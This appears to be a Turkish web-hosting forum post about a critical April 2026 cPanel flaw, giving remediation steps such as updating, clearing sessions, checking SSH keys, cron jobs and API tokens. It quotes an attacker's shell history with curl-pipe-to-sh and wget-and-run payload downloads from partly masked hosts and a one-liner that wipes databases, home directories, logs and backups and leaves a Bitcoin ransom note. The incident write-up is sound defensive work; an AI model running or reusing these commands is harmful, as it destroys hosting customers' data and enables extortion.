Tekil Mesaj gösterimi - cPanel - Kritik Güvenlik Zafiyeti

Konu cPanel - Kritik Güvenlik Zafiyeti

30-04-2026, 10:06:59

#11

Elazığlı168

sunucuoptimizasyon.com
Güvenlik açığı ile ilgili edindiğimiz bilgiler;

Saldırgan bir şekilde uzaktan root şifresi gerekmeden token oluşturuyor ve whm'ye root yetki ile erişim sağlıyor. Ardından aşağıdaki komutları çalıştırıyor /home ve /var/lib/mysql klasörünün içini boşaltıyor btc fidyesi istediğine dair bir index.html'yi tüm sitelere koyup çıkıyor.

Exploit'in tam olarak çalışmadığı durumlarda dosyalar ve veritabanları silinmiyor fakat açık devam ettiği sürece silinmeyeceğinin garantisi yok.

Bazı sunucularda root şifresinin değiştirildiğini gördük.
```
 266  2026-04-30 05:37:23 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516643467342442__
  267  2026-04-30 05:37:28 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516648634602778__
  268  2026-04-30 05:38:32 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516712767532216__
  269  2026-04-30 05:38:34 p6KjZRS0qb566ZT8
  270  2026-04-30 05:38:35  echo 59r8S55t; uname ; echo uKMzDxwm
  271  2026-04-30 05:38:35  export HISTORY=
  272  2026-04-30 05:38:37 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516717662270481__
  273  2026-04-30 05:38:39 9XHVUGYBe8d69cav
  274  2026-04-30 05:38:39  echo aSWrB2Db; uname ; echo gBAKTZPJ
  275  2026-04-30 05:38:40  export HISTORY=
  276  2026-04-30 05:38:46 curl http://45.205.1.**:13338/|sh ; echo __CMD_DONE_1777516726934665439__
  277  2026-04-30 05:57:51 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517871475262140__
  278  2026-04-30 05:57:57 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517877538308830__
  279  2026-04-30 05:58:08 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517888303469299__
  280  2026-04-30 05:58:29 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517909111748499__
  281  2026-04-30 05:58:32 wget http://87.121.84.**/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd;                          rm -rf nuclear.x86 ; echo __CMD_DONE_1777517912307294097__
  282  2026-04-30 07:22:55 awk -F'==' '{print $1}' /etc/userdatadomains
  283  2026-04-30 07:22:55 ( rm -rf /var/lib/mysql/* &> /dev/null; rm -rf /var/cpanel/sessions/* &> /dev/                         null;  rm -rf /home/*/ &> /dev/null; awk -F'==' '{print $5}' /etc/userdatadomains | while read dir; do mk                         dir -p $dir && echo "to recover your files, kindly send 0.1 BTC to bc1q9nh4revv6yqhj2gc5usncrpsfnh7ypwr9h                         0sp2 and tweet ty15b6TOTuBuzUhfypJeagHl4e2sAs26, then we will help u <3 " > $dir/index.html; done &> /dev                         /null; history -c; rm -rf /var/log/* &> /dev/null; rm -rf /home/*/.cpanel/backup/* &> /dev/null; whmapi1                          configureservice service=cpsrvd enabled=0 monitored=0 && whmapi1 configureservice service=cpdavd enabled=                         0 monitored=0 && /scripts/restartsrv_cpsrvd --stop && /scripts/restartsrv_cpdavd --stop ) &
  284  2026-04-30 07:22:55 exit
```
******************

UYGULANACAK ADIMLAR !!!

Root şifrenizle sunucunuza giriş yapamıyorsanız açıktan yüzde 99 etkilenmişsinizdir demektir. Kvm/konsol üzerinden root şifrenizi sıfırlayınız.

Ana dizinde nuclear ile başlayan dosyalar varsa hepsini silin.

Cpanel update işlemini ssh üzerinden acil olarak yapın, güncelleme yaptıktan sonra cpanel sürümünüzü kontrol edin.

Güncelleme komutu;

/scripts/upcp --force

Açığın fixlendiği sürümler;

11.86.0.41
11.110.0.97
11.118.0.63
11.126.0.54
11.130.0.19
11.132.0.29
11.136.0.5
11.134.0.20

Sunucunuz bu cpanel sürümlerinden birinde olmalıdır bu versiyonların altındaki tüm sürümler açık barındırıyor. Örneğin 11.134.0.20 açığın kapatıldığı stabil güncel sürümdür, 11.134.0.19 sürümü dahil geriye dönük sürümler risk barındırır.

Güncelleme tamamlandıktan sonra ssh üzerinden sürüm kontrolü için komut;

cat /usr/local/cpanel/version

Güncelleme sonrası sürüm açığın giderildiği sürümde ise;

/usr/local/cpanel/bin/servers_queue run

komutuyla güncelleme sonrası bekleyen arka plan işlemlerinin tamamlanmasını sağlıyoruz.

*** rm komutlarını dikkatli kullanın fazladan boşluk satır atlaması yapmayın ***

rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/preauth/*

komutlarıyla daha önceden açılmış zararlı zararsız tüm sessionları siliyoruz.

/scripts/restartsrv_cpsrvd --hard

komutuyla cpanel servisini yeniden başlatıyoruz.

***

/ root / .ssh / klasörü içinden güncel bir ssh key var mı kontrol ediniz ssh key kullanmıyorsanız "/ etc / ssh / sshd_config" içinden "PubkeyAuthentication" ayarını no yapıp ssh servisini service sshd restart komutuyla yeniden başlatın.

Cron dosyaları / var / spool /cron/ root ve / etc /cron.d dosyalarını inceleyiniz güncel bir değişiklik anormallik var mı kontrol ediniz.

Yeni açılmış bir hosting hesabı var mı kontrol ediniz, bazı sunucularda support isimli bir hosting hesabı açıldığı görülmüştür, yabancı hesaplar veya reseller hesabı varsa terminate ediniz. Whm api tokenleri kontrol edin yeni eklenmiş api tokenler varsa revoke ediniz.

Her ihtimale karşı root şifrenizi değiştiriniz ve sunucuyu reboot komutuyla yeniden başlatınız. Sunucu açıldıktan sonra eğer site dosyalarınız duruyor ve şifrelenmemiş ise güncel yedek alınız. Otomatik yedekleme ayarlanmış ise olaydan önce alınmış tüm yedekleri değişiklik tarihlerine dikkat ederek indiriniz.

***

Whm'de saldırgan tarafından injeksiyon edilmiş bir token/session kalmış mı kontrol etmek için https://support.cpanel.net/hc/en-us/...ate-04-28-2026 linkinde en altta yer alan detection script dosyasını çalıştırıp kontrol sağlayabilirsiniz.

Sonuç aşağıdaki gibi "[+] No indicators of compromise found." şeklinde ise önceki saldırılardan kalan ve tehlike oluşturabilecek bir token kalmamış demektir. Tüm bu işlemlere rağmen sunucudan dışarıya saldırı, port scan gibi aktiviteler devam ediyorsa, cpanel sistem dosyaları şifrelenmiş ve cpanel çalışamaz duruma geldi ise arka kapı kalmış olması riski yüksek ise aynı sunucuyu kullanmaya devam etmeyiniz temiz kurulum yapınız.
```
[*] Scanning session files for injection indicators...

=================================================================
                       SCAN SUMMARY
=================================================================
  CRITICAL findings: 0
  WARNING  findings: 0
  ATTEMPT  findings: 0
  INFO     findings: 0
  Total            : 0
-----------------------------------------------------------------
[+] No indicators of compromise found.
```